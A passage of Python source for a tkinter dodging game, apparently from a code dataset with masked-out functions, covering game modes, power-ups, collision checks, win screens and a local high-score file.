hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\n<mask token>\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\n<mask token>\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\n<mask token>\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\n<mask token>\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\n<mask token>\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\n<mask token>\n\n\ndef timerFired(data):\n if data.mode == 'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\n<mask token>\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef 